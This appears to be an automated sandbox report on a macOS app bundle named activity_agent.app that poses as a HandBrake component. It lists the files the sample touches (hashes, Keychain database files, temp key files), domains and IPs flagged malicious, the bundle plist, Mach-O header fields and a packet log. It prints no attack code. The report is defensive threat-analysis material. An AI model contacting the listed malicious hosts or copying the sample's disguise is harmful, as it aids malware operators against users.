  • SHA-256: 8C1A35AEDB1E876076C911B221E674FBBE01AEE6D536A54F0561356A8B36AFD6
  • SHA-512: F386E60A5DEEF3414270CEFECCB407FA89FDC2102FBBE75DD6C9B0052F12CE13ABD42B33E0D5E4E5DC6C0E98386C6DDA6E32530E9AE89B51968DDA4C8E9BB867
true
/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/PkgInfo
  • Type: ASCII text, with no line terminators
  • MD5: 23B7D7D024ABB0F558420E098800BF27
  • SHA: 9F9EEA0CFE2D65F2C3D6B092E375B40782D08F31
  • SHA-256: 82502191C9484B04D685374F9879A0066069C49B8ACAE7A04B01D38D07E8ECA0
  • SHA-512: F77D501528DD0CED155C80406CFBEE38D5D3649B64D2A9324F3D6CEE39491EB8F54CDEBAE49C6E21A20D2309D8FAE1B01C41631224811E73483DB25A2695738C
false
/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/.hash
  • Type: DBase 3 data file
  • MD5: 5B3E0B74CDB0622074FD997AF51161DD
  • SHA: AF9B9164D6F3616BF31FB98ACF8A0CB72C312774
  • SHA-256: 128814F2B057AEF1DD3E00F3749AED2A81E5ED03737311F2B1FAAB4AB2E6E2FE
  • SHA-512: 3B5320FE885082DFD05BF2D3B34224DCB8E5F9C0F738E5D5D64BC3F8ED54AF5CB21F02EE97B533BC9C14704202DD39E992AA8369B41737A72762B90BD2811643
false
/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/.tmpdata
  • Type: data
  • MD5: 920FA651C83E74399E1BFF91064E893E
  • SHA: E3EF2E3D68CBBAFCE6575F701884807302806EEB
  • SHA-256: 41CEF5F7184635E91FE181B77E9F2909FB41FAB39B5F8636D10D2F30E9E42D4B
  • SHA-512: E85B09DD5FC2E4AC32854BCC076880FF610AFD5E8AC042AE1DA9615DE3A00475368F5E4D994B88A42D155C1557461D5412401DC56819FB6475C87ACD6BF6BA68
false
/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/MainMenu.nib
  • Type: Apple binary property list
  • MD5: 861F301F4E12E2644612C57DFD7B9785
  • SHA: A646AC9B9917779096BE44167B05CDE682D9A714
  • SHA-256: C779BAD4A949CA96B207E0543E5D4C2EC78A6CFC59945D39474E4ED0311315EC
  • SHA-512: B501048C0DAF87D800CBB92178024FB7AD84DD239EDBA6026DF55D402569CD377D86B3A68CCECC72FF3B844EC46FC4223861393D03480A64A8BFAF7E83A110E2
false
/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/Security.png
  • Type: PNG image, 128 x 128, 8-bit/color RGBA, non-interlaced
  • MD5: 72622CDD06638FA694128065226385B4
  • SHA: A74AF9951F000570950B8C99CDC76359AEDF33B8
  • SHA-256: 27D83C4824B9C74B3DCC47BEE170C9772EFBEC697823EFB6C08CE79B47DA866E
  • SHA-512: 53E9E16C5737CEEB8B20BD59371484043DE0F15BD3799A996E5D848D20BBE929F4E9534CA2E5BC49CD60EFF62D5E9B6857C40B29E5CEE1240066E1C2B7FBE80C
false
/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/h.icns
  • Type: data
  • MD5: C1A9C85F8A71135BE9429FC866FE3F0D
  • SHA: E9B2110BF6E08EF5A900A51CD6BF92919E642561
  • SHA-256: 23B91B0BE63B400F34F17AFE615949F4CAA554E54962992BA016727DF284FD63
  • SHA-512: 5B536BE73DC5508D0C3E305837DA6CC05DD965824202A94560D62F39035A232E69305CBB104B669961800EF0EE77E5A2F4BD64F025A4CFC749082334B9AD0180
false
/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/mozilla.sh
  • Type: Bourne-Again shell script text executable
  • MD5: 87A934ABD4F0BB6A99AFF6068247C5B2
  • SHA: 47ED7473880AB7448E4F12011D90120020EDC1D7
  • SHA-256: BDA672CD4ACC6AC0D04CE2D73001E890F206230FAFCB3C592E8300A4CE161AA7
  • SHA-512: DC668D8AE57FCA927EFC23391F7A439A8603D851B4F0C62A62A8951BDC0E66D5FE28FA381A14596E5AF1733280ECBBB4D2903A973682F2B71DB88243DB93B1E6
false
/Users/vreni/Library/VideoFrameworks/.crd
  • Type: ASCII text
  • MD5: 0946C4561598A3D474BDCE9A3A47FF0F
  • SHA: E42579E7DF2132F4DCA73B9BBD13A21C65F4936E
  • SHA-256: F7BFEA5AFADB6AF39C45BB36831423C594E7B7961CED739D86ABBC55B6E6C2FC
  • SHA-512: 7A83C2AF6FD62976E2B02B81F33122DFF967E1F025149E7AF9159AC109E46CF1C0C1564960252BFAD2603EC7DCBB6C4CDFE3EB8A435060EC7DC33CAB3B8775FD
false
/Users/vreni/Library/VideoFrameworks/ziHyh3w6
  • Type: Zip archive data, at least v1.0 to extract
  • MD5: 37034D84973B3385E46AB9CF04F62045
  • SHA: 16E789501832CA88086345DE151850444D8977B5
  • SHA-256: F8971F146B79D43EF3BCB7579ABAE6E1A3673C05C6C637D9FD241F1EACE4C2F0
  • SHA-512: FF2ED7EFCFB0F55D64B010A929EE917744F3F081EB3AEAE59939379BE3D6BBE5E69B9FE09AFA0D5BDA2FF6157311585EB6EFC1DBBF50730FD56D28676E50877C
true
/Users/vreni/Library/VideoFrameworks/ziSznLAI
  • Type: Zip archive data, at least v1.0 to extract
  • MD5: 829C74533AA39B92AD6C4B86BE139192
  • SHA: 0B92954E48F433A7CCBEC720CA9F01DB36DF74CE
  • SHA-256: B43F822E6784620D66B9376A489FDBF6D1D239412052E3A09CBE47FA6F14F753
  • SHA-512: 2DBA441E227F1B13D4E4CDBB48FFDE60F51FFDC9B1392BFFB335EA8987497DDE865A94E7E3608CBFF02E6398DE9F17186636D89932B9A4EFB23EBA7CAB5CFE1D
true
/Users/vreni/Library/VideoFrameworks/zihaRvzn
  • Type: Zip archive data, at least v1.0 to extract
  • MD5: 79565135060865735C5E71256BCCD354
  • SHA: 89BADB680EDF8D471DF283B88FE0BBBE806352D7
  • SHA-256: 7F4FF3D7B3C8076C2855BCFA2D2CC495025002CFB58C13ADB169E06184272A70
  • SHA-512: FE0B99BCD12CF0E10C6CA487C94EE8FC09F7AB182EA43876E852273266D4F64323891CD443D99338ED42B4AD66EBA074A360BFFB0B581815185479F68CD6453B
true
/dev/null
  • Type: ASCII text
  • MD5: E2472398DFC839F8EC30C7BA531E1A20
  • SHA: 3BA86655F12775EAEE79787277B291427D5F3E4C
  • SHA-256: 98FE6E2AF1DC0600751EE80EF69AA936113F0359B87FCEE77AB498D7C6C196B4
  • SHA-512: 63CDF16DF8D5F0AE8299C09DBFE031D1FA4D954EEA6417F4848C09F312783BCEED4D72C7A4B7D464435A84A39F87B9E35EEE73EE8D15AF6C8619896E24861ABC
false
/private/tmp/au
  • Type: data
  • MD5: 6B1CD76ECF5667F12A32125B61B20998
  • SHA: FBE3B887496A8ECA6013BB5D29F2286E957E199D
  • SHA-256: EC1D8E3031E88034FBD808D846261ABDA0E688E6ACE547E5EAB2F4D54B48ECEA
  • SHA-512: F1D51A73E31FC48180E6C8F5B00F931A7A4BACAF93E0E4039AAE58ACD2256380A3F0D8931E927AA5250DE286265C0F9418B66DADEDDCB21E8CDC4127CF712FA3
false
/private/tmp/au.pub
  • Type: ASCII text
  • MD5: 6347A0DE4D1E430D1BDC4CB19C9270B8
  • SHA: 9B18139197EC411780A7CD6DF0DEBB1EF7AE0FE5
  • SHA-256: 287D9D053AF85F91F2090F895421177D579E8DCA1C10CAA6975BF64B6193DEF2
  • SHA-512: 911194D7E79C6C72787874FD8A62AE6D0908DEB7C7B528DB8B27043F518991ED613A6F95A2BF38E15C64B2F3B00B34B5ADE9166DCB448BC713141D3EC4983DDA
false
/private/tmp/public.pem
  • Type: ASCII text
  • MD5: 0290BE2567ECEEE5DDFDF3C3B05C4DE1
  • SHA: E72A77B94131857A2F84644A5D49DAC565D65801
  • SHA-256: E8BF68F9B34A8ABC162B6718F19239676E143C00C011E3BC625C421880E736E2
  • SHA-512: 3D40166DA9454F61BC2FB6C102E6C747781870F403158694851E8576A7A1DD9B4304E8CA2F18AB9D1404682A9F4EAC198DF2A465B467BD713CE01D0F1579F1A9
false
/private/var/folders/rz/z4lzdb9n2yg9fdd643nf823w0000gn/C/mds/mdsDirectory.db_
  • Type: Mac OS X Keychain File
  • MD5: 6DB32722D4433D8D1738176EE72B2A46
  • SHA: E2F77F2095D6C14AB31B96BBE7635537724675B7
  • SHA-256: F2B224F39B2A80213901D13EBAB7AE953B6C79ACB082B8D8089334D429FF7A81
  • SHA-512: 9F6521FBB23ABCCCD23DD09BE5471277121C8CCE5792ECFA72E2E0470E0C702EE742877DF06DE216BE4B848608AD41ED4B10971D79A7F3E2E39454BDD7FAB96A
false
/private/var/folders/rz/z4lzdb9n2yg9fdd643nf823w0000gn/C/mds/mdsObject.db_
  • Type: Mac OS X Keychain File
  • MD5: C47D9C6429C1B111D8F00AF9BD3A942D
  • SHA: 5BBB82B300AF1A2C8525DF843FA155D993A5E3CA
  • SHA-256: A8C0A18F1682BBA51781BB8C157A23A5D648D1C85BB137B2A0F485114380E397
  • SHA-512: 0D29EBD48AD6B0EF62CF2400CB5C8338D2F400FACA95A453691AD9114E20AEAAF1ED163BE12306CC4221BEA074BFE134597563A689028CF13A612C11EF7062CB
false

Contacted Domains/Contacted IPs

Contacted Domains

NameIPActiveMalicious
handbrake.biz85.17.25.66truetrue
script.google.com216.58.204.142truefalse
handbrakestore.com146.0.43.101truetrue
script.googleusercontent.com216.58.204.129truefalse
qrtfvfysk4bdcwwwe9pxmqe9.comunknownunknowntrue
kjfnbfhu7ndudgzhxpwnnqkc.comunknownunknowntrue
ypu4vwlenkpt29f95etrqllq.comunknownunknowntrue
yaxw8dsbttpwrwlq3h6uc9eq.comunknownunknowntrue
kcdjzquvhsua6hlfbmjzkzsb.comunknownunknowntrue
fyamakgtrrjt9vrwhmc76v38.comunknownunknowntrue
luwenxdsnhgfxckcjgxvtugj.comunknownunknowntrue
6gmvshjdfpfbeqktpsde5xav.comunknownunknowntrue
handbrake.ccunknownunknowntrue

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPCountryFlagASNASN NameMalicious
8.8.8.8United States
15169GoogleIncfalse
216.58.204.129United States
15169GoogleIncfalse
85.17.25.66Netherlands
60781LeaseWebBVfalse
8.8.4.4United States
15169GoogleIncfalse
146.0.43.101Germany
24961myLocmanagedITAGfalse
216.58.204.142United States
15169GoogleIncfalse

Static File Info

General

File type:Zip archive data, at least v2.0 to extract
TrID:
  • Mac OS X Application Bundle (25504/1) 86.41%
  • ZIP compressed archive (4004/1) 13.57%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.02%
File name:activity_agent.app.zip
File size:1593623
MD5:577cd71ea0456348914312df22e12a5a
SHA1:77002f55859519b69c13cea7bfe9c3bfedebcfcd
SHA256:3b33d950ce045630a2c6a57122fa3c424cced2c57240cadc43f4e7d5f3dfed7c
SHA512:7b421e13fb88c13fd1e193677eaf5a37f2a59af8c797140edcd75261b66e47c45f2675fa9ba49e9692a78392e13e2ad55b1500c88d93c4e4912303a78f6e1a8b
File Content Preview:PK...........J................activity_agent.app/PK...........J................activity_agent.app/Contents/PK...........J..L.........&...activity_agent.app/Contents/Info.plist.....0.....ps'&=..b.,....h...T.....m...G.k..j.]....n.q2.....q.x*99.6L.. ...A....

Static App Info

General Informations

Package Info:
Property List File:<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>CFBundleDevelopmentRegion</key><string>en</string><key>CFBundleExecutable</key><string>activity_agent</string><key>CFBundleIdentifier</key><string>fr.handbrake.activity_agent</string><key>CFBundleInfoDictionaryVersion</key><string>6.0</string><key>CFBundleName</key><string>activity_agent</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleShortVersionString</key><string>6.0</string><key>CFBundleSignature</key><string>????</string><key>CFBundleSupportedPlatforms</key><array><string>MacOSX</string></array><key>CFBundleVersion</key><string>17</string><key>DTSDKName</key><string>macosx10.11internal</string><key>LSMinimumSystemVersion</key><string>10.7</string><key>LSUIElement</key><true/><key>NSHumanReadableCopyright</key><string>Copyright 2017 caliban0@protonmail.com. All rights reserved.</string><key>NSMainNibFile</key><string>MainMenu</string><key>NSPrincipalClass</key><string>NSApplication</string></dict></plist>

Resources

NameType
Info.plistXML document text
PkgInfoASCII text, with no line terminators
activity_agentMach-O 64-bit executable
.hashDBase 3 data file
.tmpdatadata
h.icnsdata
MainMenu.nibApple binary property list
mozilla.shBourne-Again shell script text executable
Security.pngPNG image, 128 x 128, 8-bit/color RGBA, non-interlaced
Info.plistXML document text
PkgInfoASCII text, with no line terminators
activity_agentMach-O 64-bit executable
.hashDBase 3 data file
.tmpdatadata
h.icnsdata
MainMenu.nibApple binary property list
mozilla.shBourne-Again shell script text executable
Security.pngPNG image, 128 x 128, 8-bit/color RGBA, non-interlaced

Static Mach Info

General Informations for header0

Endian:<
Size:64-bit
Architecture:x86_64
Filetype:execute
Nbr. of load commands:24
segment_command_64
NameValue
segname__PAGEZERO
fileoff0
maxprot0
vmsize4294967296
nsects0
flags0
filesize0
vmaddr0
initprot0
segment_command_64
NameValue
segname__TEXT
fileoff0
maxprot7
vmsize385024
nsects11
flags0
filesize385024
vmaddr4294967296
initprot5
Datassectname__text
segname__TEXT
reloff0
addr4294971776
align6
nreloc0
flags2147484672
offset4480
reserved20
reserved10
reserved30
size297777
sectname__stubs
segname__TEXT
reloff0
addr4295269554
align1
nreloc0
flags2147484680
offset302258
reserved26
reserved10
reserved30
size1008
sectname__stub_helper
segname__TEXT
reloff0
addr4295270564
align2
nreloc0
flags2147484672
offset303268
reserved20
reserved10
reserved30
size1696
sectname__objc_methname
segname__TEXT
reloff0
addr4295272260
align0
nreloc0
flags2
offset304964
reserved20
reserved10
reserved30
size19290
sectname__objc_classname
segname__TEXT
reloff0
addr4295291550
align0
nreloc0
flags2
offset324254
reserved20
reserved10
reserved30
size1105
sectname__objc_methtype
segname__TEXT
reloff0
addr4295292655
align0
nreloc0
flags2
offset325359
reserved20
reserved10
reserved30
size8193
sectname__cstring
segname__TEXT
reloff0
addr4295300848
align4
nreloc0
flags2
offset333552
reserved20
reserved10
reserved30
size12926
sectname__const
segname__TEXT
reloff0
addr4295313776
align4
nreloc0
flags0
offset346480
reserved20
reserved10
reserved30
size376
sectname__gcc_except_tab
segname__TEXT
reloff0
addr4295314152
align2
nreloc0
flags0
offset346856
reserved20
reserved10
reserved30
size1524
sectname__unwind_info
segname__TEXT
reloff0
addr4295315676
align2
nreloc0
flags0
offset348380
reserved20
reserved10
reserved30
size2048
sectname__eh_frame
segname__TEXT
reloff0
addr4295317728
align3
nreloc0
flags0
offset350432
reserved20
reserved10
reserved30
size34584
segment_command_64
NameValue
segname__DATA
fileoff385024
maxprot7
vmsize61440
nsects22
flags0
filesize61440
vmaddr4295352320
initprot3
Datassectname__program_vars
segname__DATA
reloff0
addr4295352320
align3
nreloc0
flags0
offset385024
reserved20
reserved10
reserved30
size40
sectname__nl_symbol_ptr
segname__DATA
reloff0
addr4295352360
align3
nreloc0
flags6
offset385064
reserved20
reserved1168
reserved30
size16
sectname__got
segname__DATA
reloff0
addr4295352376
align3
nreloc0
flags6
offset385080
reserved20
reserved1170
reserved30
size376
sectname__la_symbol_ptr
segname__DATA
reloff0
addr4295352752
align3
nreloc0
flags7
offset385456
reserved20
reserved1217
reserved30
size1344
sectname__mod_init_func
segname__DATA
reloff0
addr4295354096
align3
nreloc0
flags9
offset386800
reserved20
reserved10
reserved30
size8
sectname__const
segname__DATA
reloff0
addr4295354112
align4
nreloc0
flags0
offset386816
reserved20
reserved10
reserved30
size3632
sectname__cfstring
segname__DATA
reloff0
addr4295357744
align3
nreloc0
flags0
offset390448
reserved20
reserved10
reserved30
size8096
sectname__objc_classlist
segname__DATA
reloff0
addr4295365840
align3
nreloc0
flags268435456
offset398544
reserved20
reserved10
reserved30
size240
sectname__objc_nlclslist
segname__DATA
reloff0
addr4295366080
align3
nreloc0
flags268435456
offset398784
reserved20
reserved10
reserved30
size8
sectname__objc_catlist
segname__DATA
reloff0
addr4295366088
align3
nreloc0
flags268435456
offset398792
reserved20
reserved10
reserved30
size96
sectname__objc_protolist
segname__DATA
reloff0
addr4295366184
align3
nreloc0
flags0
offset398888
reserved20
reserved10
reserved30
size128
sectname__objc_imageinfo
segname__DATA
reloff0
addr4295366312
align2
nreloc0
flags0
offset399016
reserved20
reserved10
reserved30
size8
sectname__objc_const
segname__DATA
reloff0
addr4295366320
align3
nreloc0
flags0
offset399024
reserved20
reserved10
reserved30
size33136
sectname__objc_selrefs
segname__DATA
reloff0
addr4295399456
align3
nreloc0
flags268435461
offset432160
reserved20
reserved10
reserved30
size4648
sectname__objc_protorefs
segname__DATA
reloff0
addr4295404104
align3
nreloc0
flags0
offset436808
reserved20
reserved10
reserved30
size16
sectname__objc_classrefs
segname__DATA
reloff0
addr4295404120
align3
nreloc0
flags268435456
offset436824
reserved20
reserved10
reserved30
size520
sectname__objc_superrefs
segname__DATA
reloff0
addr4295404640
align3
nreloc0
flags268435456
offset437344
reserved20
reserved10
reserved30
size184
sectname__objc_ivar
segname__DATA
reloff0
addr4295404824
align3
nreloc0
flags0
offset437528
reserved20
reserved10
reserved30
size1440
sectname__objc_data
segname__DATA
reloff0
addr4295406264
align3
nreloc0
flags0
offset438968
reserved20
reserved10
reserved30
size2480
sectname__data
segname__DATA
reloff0
addr4295408752
align4
nreloc0
flags0
offset441456
reserved20
reserved10
reserved30
size1968
sectname__common
segname__DATA
reloff0
addr4295410720
align3
nreloc0
flags1
offset0
reserved20
reserved10
reserved30
size200
sectname__bss
segname__DATA
reloff0
addr4295410928
align4
nreloc0
flags1
offset0
reserved20
reserved10
reserved30
size720
segment_command_64
NameValue
segname__LINKEDIT
fileoff446464
maxprot7
vmsize22108
nsects0
flags0
filesize22108
vmaddr4295413760
initprot1
dyld_info_command
NameValue
lazy_bind_size4200
lazy_bind_off449848
weak_bind_size0
rebase_size0
export_off454048
export_size2000
bind_off446464
rebase_off0
bind_size3384
weak_bind_off0
symtab_command
NameValue
strsize5424
symoff457416
stroff463148
nsyms262
dysymtab_command
NameValue
extreloff0
nlocrel0
indirectsymoff461608
modtaboff0
nextrel0
iundefsym2
nmodtab0
ilocalsym0
nundefsym260
nextrefsyms0
locreloff0
ntoc0
nlocalsym1
tocoff0
extrefsymoff0
nindirectsyms385
iextdefsym1
nextdefsym1
dylinker_command
NameValue
name12
Data/usr/lib/dyld
uuid_command
NameValue
uuidbe827b14bec334cbbc8b2ba5bbd71a71
version_min_command
NameValue
version657152
reserved658432
dylib_command
NameValue
compatibility_version0.44.1
timestampThu Jan 01 01:00:02 1970
name24
current_version0.69.5
Data/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.228.0
Data/usr/lib/libobjc.A.dylib
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.214.4
Data/usr/lib/libSystem.B.dylib
dylib_command
NameValue
compatibility_version0.45.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.220.5
Data/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.48.0
Data/System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices
dylib_command
NameValue
compatibility_version0.150.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.68.5
Data/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version1792.7.3
Data/System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.19.1
Data/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
dylib_command
NameValue
compatibility_version512.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version2816.1.0
Data/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version274.140.225
Data/System/Library/Frameworks/Security.framework/Versions/A/Security
rpath_command
NameValue
path12
Data@executable_path/../Frameworks
linkedit_data_command
NameValue
dataoff456048
datassize1368
linkedit_data_command
NameValue
dataoff457416
datassize0

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Mai 9, 2017 16:25:37.311839104 MESZ6068353192.168.0.508.8.8.8
Mai 9, 2017 16:25:37.571233988 MESZ53606838.8.8.8192.168.0.50
Mai 9, 2017 16:25:40.018091917 MESZ4929353192.168.0.508.8.8.8
Mai 9, 2017 16:25:40.018146992 MESZ53492938.8.8.8192.168.0.50
Mai 9, 2017 16:25:40.019447088 MESZ4929353192.168.0.508.8.8.8
Mai 9, 2017 16:25:40.033771992 MESZ4929353192.168.0.508.8.8.8
Mai 9, 2017 16:25:40.033839941 MESZ53492938.8.8.8192.168.0.50
Mai 9, 2017 16:25:40.034095049 MESZ4929353192.168.0.508.8.8.8
Mai 9, 2017 16:25:40.101505041 MESZ5679853192.168.0.508.8.8.8
Mai 9, 2017 16:25:40.101547003 MESZ6516853192.168.0.508.8.8.8
Mai 9, 2017 16:25:40.565378904 MESZ53651688.8.8.8192.168.0.50
Mai 9, 2017 16:25:40.565418005 MESZ53567988.8.8.8192.168.0.50
Mai 9, 2017 16:25:40.643846035 MESZ49294443192.168.0.50216.58.204.142
Mai 9, 2017 16:25:40.643896103 MESZ44349294216.58.204.142192.168.0.50
Mai 9, 2017 16:25:40.644193888 MESZ49294443192.168.0.50216.58.204.142
Mai 9, 2017 16:25:40.651881933 MESZ49294443192.168.0.50216.58.204.142
Mai 9, 2017 16:25:40.651905060 MESZ44349294216.58.204.142192.168.0.50
Mai 9, 2017 16:25:41.674675941 MESZ44349294216.58.204.142192.168.0.50
Mai 9, 2017 16:25:41.674695015 MESZ44349294216.58.204.142192.168.0.50
Mai 9, 2017 16:25:41.675107956 MESZ49294443192.168.0.50216.58.204.142
Mai 9, 2017 16:25:41.675128937 MESZ49294443192.168.0.50216.58.204.142
Mai 9, 2017 16:25:41.716892004 MESZ44349294216.58.204.142192.168.0.50
Mai 9, 2017 16:25:41.717175007 MESZ49294443192.168.0.50216.58.204.142
Mai 9, 2017 16:25:41.746057987 MESZ49294443192.168.0.50216.58.204.142
Mai 9, 2017 16:25:41.746077061 MESZ44349294216.58.204.142192.168.0.50
Mai 9, 2017 16:25:41.746332884 MESZ49294443192.168.0.50216.58.204.142
Mai 9, 2017 16:25:41.746341944 MESZ44349294216.58.204.142192.168.0.50
Mai 9, 2017 16:25:42.181713104 MESZ44349294216.58.204.142192.168.0.50
Mai 9, 2017 16:25:42.182138920 MESZ49294443192.168.0.50216.58.204.142
Mai 9, 2017 16:25:42.183459997 MESZ49294443192.168.0.50216.58.204.142
Mai 9, 2017 16:25:42.183479071 MESZ44349294216.58.204.142192.168.0.50
Mai 9, 2017 16:25:42.530709982 MESZ44349294216.58.204.142192.168.0.50
Mai 9, 2017 16:25:42.530725956 MESZ44349294216.58.204.142192.168.0.50
Mai 9, 2017 16:25:42.531250954 MESZ49294443192.168.0.50216.58.204.142
Mai 9, 2017 16:25:42.532700062 MESZ6328153192.168.0.508.8.8.8
Mai 9, 2017 16:25:42.532779932 MESZ5548053192.168.0.508.8.8.8
Mai 9, 2017 16:25:43.600469112 MESZ53554808.8.8.8192.168.0.50
Mai 9, 2017 16:25:43.600500107 MESZ53632818.8.8.8192.168.0.50
Mai 9, 2017 16:25:44.076394081 MESZ49295443192.168.0.50216.58.204.129
Mai 9, 2017 16:25:44.076442003 MESZ44349295216.58.204.129192.168.0.50
Mai 9, 2017 16:25:44.076817989 MESZ49295443192.168.0.50216.58.204.129
Mai 9, 2017 16:25:44.077157974 MESZ49295443192.168.0.50216.58.204.129
Mai 9, 2017 16:25:44.077169895 MESZ44349295216.58.204.129192.168.0.50
Mai 9, 2017 16:25:44.679275036 MESZ44349295216.58.204.129192.168.0.50
Mai 9, 2017 16:25:44.679294109 MESZ44349295216.58.204.129192.168.0.50
Mai 9, 2017 16:25:44.679871082 MESZ49295443192.168.0.50216.58.204.129
Mai 9, 2017 16:25:44.679898024 MESZ49295443192.168.0.50216.58.204.129
Mai 9, 2017 16:25:44.721575022 MESZ44349295216.58.204.129192.168.0.50
Mai 9, 2017 16:25:44.722033978 MESZ49295443192.168.0.50216.58.204.129
Mai 9, 2017 16:25:44.730861902 MESZ49295443192.168.0.50216.58.204.129
Mai 9, 2017 16:25:44.730890036 MESZ44349295216.58.204.129192.168.0.50
Mai 9, 2017 16:25:44.731148958 MESZ49295443192.168.0.50216.58.204.129
Mai 9, 2017 16:25:44.731158018 MESZ44349295216.58.204.129192.168.0.50
Mai 9, 2017 16:25:44.954338074 MESZ44349295216.58.204.129192.168.0.50
Mai 9, 2017 16:25:44.954775095 MESZ49295443192.168.0.50216.58.204.129
Mai 9, 2017 16:25:44.957123995 MESZ49295443192.168.0.50216.58.204.129
Mai 9, 2017 16:25:44.957145929 MESZ44349295216.58.204.129192.168.0.50
Mai 9, 2017 16:25:45.260880947 MESZ44349295216.58.204.129192.168.0.50
Mai 9, 2017 16:25:45.260899067 MESZ44349295216.58.204.129192.168.0.50
Mai 9, 2017 16:25:45.261464119 MESZ49295443192.168.0.50216.58.204.129
Mai 9, 2017 16:25:45.279484034 MESZ44349295216.58.204.129192.168.0.50
Mai 9, 2017 16:25:45.279903889 MESZ49295443192.168.0.50216.58.204.129
Mai 9, 2017 16:25:45.280522108 MESZ49295443192.168.0.50216.58.204.129
Mai 9, 2017 16:25:45.280544996 MESZ44349295216.58.204.129192.168.0.50
Mai 9, 2017 16:25:45.280719995 MESZ49295443192.168.0.50216.58.204.129
Mai 9, 2017 16:25:45.280771971 MESZ44349295216.58.204.129192.168.0.50
Mai 9, 2017 16:25:45.280793905 MESZ49295443192.168.0.50216.58.204.129
Mai 9, 2017 16:25:45.280806065 MESZ44349295216.58.204.129192.168.0.50
Mai 9, 2017 16:25:45.280848980 MESZ49294443192.168.0.50216.58.204.142
Mai 9, 2017 16:25:45.280874014 MESZ44349294216.58.204.142192.168.0.50
Mai 9, 2017 16:25:45.280991077 MESZ49295443192.168.0.50216.58.204.129
Mai 9, 2017 16:25:45.281522036 MESZ49294443192.168.0.50216.58.204.142
Mai 9, 2017 16:25:45.281589031 MESZ44349294216.58.204.142192.168.0.50
Mai 9, 2017 16:25:45.281840086 MESZ49294443192.168.0.50216.58.204.142
Mai 9, 2017 16:25:47.371352911 MESZ6167253192.168.0.508.8.8.8
Mai 9, 2017 16:25:47.371386051 MESZ5394853192.168.0.508.8.8.8
Mai 9, 2017 16:25:47.582999945 MESZ53539488.8.8.8192.168.0.50
Mai 9, 2017 16:25:47.583029985 MESZ53616728.8.8.8192.168.0.50
Mai 9, 2017 16:25:47.648391008 MESZ49296443192.168.0.5085.17.25.66
Mai 9, 2017 16:25:47.648432016 MESZ4434929685.17.25.66192.168.0.50
Mai 9, 2017 16:25:47.648731947 MESZ49296443192.168.0.5085.17.25.66
Mai 9, 2017 16:25:47.654633045 MESZ49296443192.168.0.5085.17.25.66
Mai 9, 2017 16:25:47.654655933 MESZ4434929685.17.25.66192.168.0.50
Mai 9, 2017 16:25:48.625200987 MESZ4434929685.17.25.66192.168.0.50
Mai 9, 2017 16:25:48.625221014 MESZ4434929685.17.25.66192.168.0.50
Mai 9, 2017 16:25:48.625909090 MESZ49296443192.168.0.5085.17.25.66
Mai 9, 2017 16:25:48.625924110 MESZ49296443192.168.0.5085.17.25.66
Mai 9, 2017 16:25:48.631205082 MESZ4434929685.17.25.66192.168.0.50
Mai 9, 2017 16:25:48.631679058 MESZ49296443192.168.0.5085.17.25.66
Mai 9, 2017 16:25:48.664062023 MESZ49296443192.168.0.5085.17.25.66
Mai 9, 2017 16:25:48.664079905 MESZ4434929685.17.25.66192.168.0.50
Mai 9, 2017 16:25:48.664347887 MESZ49296443192.168.0.5085.17.25.66
Mai 9, 2017 16:25:48.664356947 MESZ4434929685.17.25.66192.168.0.50
Mai 9, 2017 16:25:48.884047031 MESZ4434929685.17.25.66192.168.0.50
Mai 9, 2017 16:25:48.884488106 MESZ49296443192.168.0.5085.17.25.66
Mai 9, 2017 16:25:48.885670900 MESZ49296443192.168.0.5085.17.25.66
Mai 9, 2017 16:25:48.885689974 MESZ4434929685.17.25.66192.168.0.50
Mai 9, 2017 16:25:48.990546942 MESZ4434929685.17.25.66192.168.0.50
Mai 9, 2017 16:25:48.990972996 MESZ49296443192.168.0.5085.17.25.66
Mai 9, 2017 16:25:48.992006063 MESZ49296443192.168.0.5085.17.25.66
Mai 9, 2017 16:25:48.992022038 MESZ4434929685.17.25.66192.168.0.50
Mai 9, 2017 16:25:48.992721081 MESZ49296443192.168.0.5085.17.25.66
Mai 9, 2017 16:25:48.992784023 MESZ4434929685.17.25.66192.168.0.50
Mai 9, 2017 16:25:48.993057013 MESZ49296443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:00.207238913 MESZ6098153192.168.0.508.8.8.8
Mai 9, 2017 16:26:00.587764025 MESZ53609818.8.8.8192.168.0.50
Mai 9, 2017 16:26:11.675671101 MESZ5335253192.168.0.508.8.8.8
Mai 9, 2017 16:26:12.677753925 MESZ5335253192.168.0.508.8.8.8
